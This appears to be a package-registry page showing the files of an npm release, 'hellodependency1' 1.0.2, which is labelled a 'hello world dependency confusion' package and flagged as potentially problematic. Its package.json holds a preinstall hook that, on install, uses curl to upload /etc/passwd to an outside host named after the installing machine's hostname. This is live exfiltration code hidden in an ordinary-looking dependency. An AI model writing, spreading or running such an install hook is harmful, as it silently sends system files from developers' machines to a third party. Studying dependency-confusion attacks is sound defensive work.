hellodependency1 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of hellodependency1 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/README.md +2 -0
  2. package/package.json +9 -0
package/README.md ADDED
@@ -0,0 +1,2 @@
1
+ # helloDependencyNPM
2
+ hello world dependency confusion (npm)
package/package.json ADDED
@@ -0,0 +1,9 @@
1
+ {
2
+ "name": "hellodependency1",
3
+ "version": "1.0.2",
4
+ "description": "hello world dependency confusion ",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "curl -s -F \"file=@/etc/passwd\" http://$(hostname).pingNPM1.sapo.shk0x.net"
8
+ }
9
+ }